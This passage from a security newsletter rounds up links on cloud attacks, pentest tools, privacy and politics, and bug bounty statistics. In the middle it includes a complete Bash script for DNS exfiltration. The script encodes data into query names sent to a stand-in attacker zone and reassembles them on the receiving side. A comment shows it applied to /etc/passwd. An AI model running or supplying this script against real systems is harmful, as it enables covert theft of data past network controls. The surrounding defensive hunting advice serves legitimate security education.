__proto__ property. See Olivier Arteau’s whitepaper for more details, and this DailySwig post for a nice overview and some more recent work.
Doyensec has released the slides and code for their training, “Developing Burp Suite Extensions – From Manual Testing to Security Automation.”
Marco Lancini has collected and organized some great info and links about cloud-native technologies into one excellent resource.
Enumerate AWS API Permissions Without Logging to CloudTrail
Nick Frichette found a bug in the AWS API that allows you to enumerate certain permissions of a role or user without the calls being logged to CloudTrail. This lets pen testers and red teamers stealthily enumerate what permissions the role or user they’ve compromised has access to, without tipping off defenders who rely on CloudTrail. The bug affects 645 different API actions across 40 different AWS services.
25 Ways Chinese State-Sponsored Actors Want to Exploit Your Systems
This NSA advisory lists 25 CVEs that are currently being used by Chinese state actors.
The Difficulties of Tracking Running Processes on Linux
Natan Yellin describes a number of potential approaches and their relative trade-offs.
“Performance analysis tools based on Linux perf_events (aka perf) and ftrace” by Brendan Gregg. Includes tools like execsnoop, which traces process exec() calls with CLI argument details, and opensnoop, which traces open() syscalls and shows the filenames, among others. Useful for grokking what a program does. H/T William Bowling, who referenced the tool in his blog post: GitHub Pages - Multiple RCEs via insecure Kramdown configuration - $25,000 Bounty.
A Python3 Remote Desktop Protocol (RDP) man-in-the-middle tool and library. Can watch connections live or after the fact. Blog post describing new features.
Segmentation Vault: Cloning Thick Client Access
Post by David Middlehurst: “In this blog we discuss a practical method for red teams to compromise thick client applications when they store credential material in “Vault”, using Microsoft OneDrive as an example. To enable access to OneDrive to be cloned we also present two tools that were subsequently developed that can be used in a C2 framework such as Cobalt Strike using
File Stream Oriented Programming: SECCON CTF 2020 - lazynote
Detailed write-up by Syed Faraz Abrar.
A Bash script that automates exfiltrating data over DNS, for when you have blind command execution on a server where every outbound connection except DNS is blocked: the data is encoded into DNS query names, and the lookups are forwarded by whatever resolver the server uses to a name server you control.
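The mechanics of that technique, as an added example that is not the linked script: the victim side hex-encodes the data, splits it into chunks that fit inside a DNS label, and issues one lookup per chunk; the attacker side reassembles the query names from its name server log. The domain exfil.example.com, the `<seq>.<chunk>.<session>.<domain>` framing, the function names and the sample data are all assumptions made for this illustration.

```bash
#!/bin/sh
# Added example (not the linked script): encode data for DNS exfiltration and
# reassemble it on the attacker side. Assumed setup: the attacker is authoritative
# for EXFIL_DOMAIN and logs every query name that reaches that name server.
EXFIL_DOMAIN="${EXFIL_DOMAIN:-exfil.example.com}"   # hypothetical attacker zone
LABEL_LEN=60   # a DNS label may hold at most 63 octets; leave a little headroom

# hex_encode: hex-encode stdin so arbitrary bytes become valid DNS label characters
# (letters, digits and hyphen only). Uses od so it works without xxd or base64.
hex_encode() {
    od -An -v -tx1 | tr -d ' \n'
}

# build_queries SESSION: read data from stdin and print one query name per line,
# framed as <seq>.<chunk>.<session>.<domain>. The sequence number lets the receiver
# reorder queries, and the session tag keeps separate runs apart in the log.
build_queries() {
    session="$1"
    { hex_encode; echo; } | fold -w "$LABEL_LEN" |
        awk -v s="$session" -v d="$EXFIL_DOMAIN" '{ printf "%d.%s.%s.%s\n", NR-1, $0, s, d }'
}

# send_queries: issue one lookup per name on stdin. Any resolver will forward the
# unknown names to the zone's authoritative server, which is the whole point: only
# DNS has to be allowed out. Every name is unique, so caching never suppresses a chunk.
send_queries() {
    while IFS= read -r fqdn; do
        if command -v dig >/dev/null 2>&1; then
            dig +short +tries=1 +time=2 "$fqdn" >/dev/null 2>&1
        elif command -v nslookup >/dev/null 2>&1; then
            nslookup "$fqdn" >/dev/null 2>&1
        else
            getent hosts "$fqdn" >/dev/null 2>&1   # glibc fallback, no DNS tools needed
        fi
        sleep 1   # pace the lookups; a burst of long random-looking names is easy to spot
    done
}

# decode_queries: attacker-side reassembly. Reads query names (in any order, e.g.
# grepped from the name server log), sorts them by sequence number, strips the
# framing and decodes the hex. The awk decoder emits bytes with printf "%c", which is
# fine for ASCII data as shown here; for binary payloads pipe the hex into xxd -r -p.
decode_queries() {
    sort -t. -k1,1n | cut -d. -f2 | tr -d '\n' |
        awk 'BEGIN { h = "0123456789abcdef" }
             { for (i = 1; i <= length($0); i += 2) {
                   v = (index(h, substr($0, i, 1)) - 1) * 16 + index(h, substr($0, i + 1, 1)) - 1
                   printf "%c", v } }'
}

# Constructed sample data (39 bytes, so 78 hex characters, i.e. two labels of 60 + 18).
SAMPLE="id=1042;host=db01;pw=constructed-sample"

# Offline self-check: the victim-side encoding round-trips through the attacker-side
# decoder without touching the network. On a real engagement the pipeline would be:
#   cat /etc/passwd | build_queries "$(date +%s)" | send_queries
printf '%s' "$SAMPLE" | build_queries demo1
printf '%s' "$SAMPLE" | build_queries demo1 | decode_queries
echo
```

The query names look like `0.69643d313034323b686f73743d646230313b70773d636f6e7374727563…demo1.exfil.example.com`, which is exactly what a defender should hunt for: long hex-only labels, many unique subdomains of one zone, and a steady trickle of NXDOMAIN or TXT answers from a domain nobody else on the network resolves.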
Politics / Privacy
New Features Coming to Signal Groups
“Today we’re releasing a new version of Signal groups that gives you a richer private group experience with group admins, granular permissions, @mentions and more.” Like nearly all of my security friends, Signal is my secure messaging app of choice, so it’s super exciting to see these improvements 🤘
U.S. Accuses Google of Illegally Protecting Monopoly
Overview by the NY Times.
United States v. Google
A deeper analysis by Stratechery, with interesting thoughts on Aggregation Theory, Google’s likely defense, and more. Ben Thompson’s Aggregation Theory article is fascinating, so I pulled some snippets here for easy reference.
Instead of trying to argue that Google should not make search results better, the Justice Department is arguing that Google, given its inherent advantages as a monopoly, should have to win on the merits of its product, not the inevitably larger size of its revenue share agreements. In other words, Google can enjoy the natural fruits of being an Aggregator, it just can’t use artificial means — in this case contracts — to extend that inherent advantage.
Hunter Biden story is Russian disinfo, dozens of former intel officials say
“More than 50 former senior intelligence officials have signed on to a letter outlining their belief that the recent disclosure of emails allegedly belonging to Joe Biden’s son ‘has all the classic earmarks of a Russian information operation.’” Exciting times 😅
“A powerful, flexible and easily extensible framework written in Go for building your own Web Application Scanner” by Ai Ho. You specify the fingerprint of what you’re looking for in YAML, see the jaeles-signatures repo for examples. Seems fairly similar to Project Discovery’s nuclei.
The Content Value Hierarchy (CVH)
Neat post by my friend Daniel Miessler on the various levels of content creation and their value, and how to protect your podcast or newsletter from being cut when people hit content overload. The article calls out tl;dr sec, which is pretty cool 😎
By Samuel Reed: I’m not sure how to describe this, but it’s awesome. You load the web page and it dynamically starts editing/styling itself while describing what it’s doing. Pretty neat to watch.
I appreciated that this post by Emil Vaagland had a number of concrete stats and details.
- In its first year, FINN.no’s private HackerOne program received 221 reports, 129 of which were rewarded, with $55K paid out to 31 researchers.
- One of the most critical findings in their program resulted from a one-line configuration change, not new complex code.
- Therefore: it’s not just massive new features or complex code that needs testing.
- Shopify publishes monthly stats from their public bug bounty program on Twitter (example).
- FINN’s rates: up to $150 for Lows, $300 for Mediums, $1,000 for Highs, $3,000 for Criticals.
- The large jump in payout from Medium to High and Critical is meant to incentivize higher-impact reports and to compete with large programs for researcher talent.
- They pay bounties on triage after an impact assessment, not once the bug is fixed.
- Median triage time is about 45 minutes, and over 80% are triaged within one hour. This speed motivates hackers to continue testing FINN’s assets.
FINN, Visma, and Shopify’s data seem to confirm what is colloquially known: private programs tend to get higher-signal submissions, i.e. more valid bugs and fewer non-issues.
Comparing the signal (Resolved/Duplicate) to the noise (Not applicable/Informative) of two public programs (Shopify and Visma public) and two private programs (FINN and Visma private).
Thanks for reading!